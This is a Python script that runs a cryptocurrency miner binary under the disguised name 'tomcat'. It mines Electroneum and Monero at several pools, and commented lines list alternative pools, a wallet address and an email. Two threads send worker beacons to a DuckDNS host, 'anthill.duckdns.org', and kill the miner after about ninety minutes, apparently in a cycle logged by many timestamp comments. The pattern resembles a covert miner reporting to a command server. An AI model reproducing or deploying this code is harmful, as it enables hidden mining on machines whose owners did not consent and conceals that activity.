import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:03.685680
#2018-02-17 16:48:03.931266
#2018-02-17 18:37:03.558072
#2018-02-17 20:26:05.466304
#2018-02-17 22:13:06.971369
#2018-02-17 23:57:05.270892
#2018-02-18 01:48:05.673364
#2018-02-18 03:34:07.309741
#2018-02-18 05:22:06.766782
#2018-02-18 07:13:05.844226
#2018-02-18 09:01:01.278201
#2018-02-18 10:48:01.376287
#2018-02-18 12:34:08.703183
#2018-02-18 14:21:07.930028
#2018-02-18 16:12:05.809858
#2018-02-18 18:00:01.823083
#2018-02-18 19:47:04.115894
#2018-02-18 21:32:03.778057
#2018-02-18 23:21:01.591482
#2018-02-19 01:08:01.710141
#2018-02-19 02:54:05.672515
#2018-02-19 04:40:04.339707
#2018-02-19 06:25:03.579985
#2018-02-19 08:14:05.412294
#2018-02-19 10:04:06.092866
#2018-02-19 11:53:01.936258
#2018-02-19 13:39:08.202947
#2018-02-19 15:26:05.678413
#2018-02-19 17:14:01.540437
#2018-02-19 19:02:04.992548
#2018-02-19 20:48:06.643339
#2018-02-19 22:35:08.701781
#2018-02-20 00:20:07.476860
#2018-02-20 02:08:01.516134
#2018-02-20 03:57:06.469085
#2018-02-20 05:43:04.285146
#2018-02-20 07:30:07.654205
#2018-02-20 09:14:07.240085
#2018-02-20 10:57:01.542534
#2018-02-20 12:44:07.909188
#2018-02-20 14:29:08.371314
#2018-02-20 16:13:01.777702
#2018-02-20 17:57:09.695257
#2018-02-20 19:48:09.135432
#2018-02-20 21:36:01.952471
#2018-02-20 23:18:06.827931
#2018-02-21 01:04:04.088236
#2018-02-21 02:50:04.078564
#2018-02-21 04:39:04.169997
#2018-02-21 06:26:07.611056
#2018-02-21 08:11:01.274601
#2018-02-21 09:58:01.984342
#2018-02-21 11:46:02.182142
#2018-02-21 13:37:08.699337
#2018-02-21 15:22:01.459848
#2018-02-21 17:11:08.026545
#2018-02-21 19:00:09.782009
#2018-02-21 20:46:10.695913
#2018-02-21 22:31:02.257090
#2018-02-22 00:21:01.936057
#2018-02-22 02:08:05.951378
#2018-02-22 03:55:05.736658
#2018-02-22 05:42:05.770192
#2018-02-22 07:26:05.925043
#2018-02-22 09:14:01.819076
#2018-02-22 11:01:05.937252
#2018-02-22 12:47:04.217228
#2018-02-22 14:33:09.161422
#2018-02-22 16:20:10.242587
#2018-02-22 18:08:02.242428
#2018-02-22 19:58:04.826995
#2018-02-22 21:47:06.483187
#2018-02-22 23:36:01.645946
#2018-02-23 01:23:06.813034
#2018-02-23 03:11:07.026068
#2018-02-23 04:59:03.833185
#2018-02-23 06:44:04.609387
#2018-02-23 08:36:06.693584
#2018-02-23 10:51:04.779590
#2018-02-23 12:48:07.361045
#2018-02-23 14:31:08.353483
#2018-02-23 16:21:02.219275
#2018-02-23 18:07:09.205946
#2018-02-23 19:53:07.263123
#2018-02-23 21:37:01.303051
#2018-02-23 23:25:06.808479
#2018-02-24 01:17:03.937351
#2018-02-24 03:07:01.649016
#2018-02-24 04:53:04.570168
#2018-02-24 06:37:03.903988
#2018-02-24 08:25:06.772019
#2018-02-24 10:12:07.308135
#2018-02-24 12:07:07.056057
#2018-02-24 13:56:06.748618
#2018-02-24 15:47:01.714474
#2018-02-24 17:42:03.924812
#2018-02-24 19:27:01.941765
#2018-02-24 21:17:03.774197
#2018-02-24 23:54:05.302846
#2018-02-25 03:46:02.055165
#2018-02-25 07:31:05.666365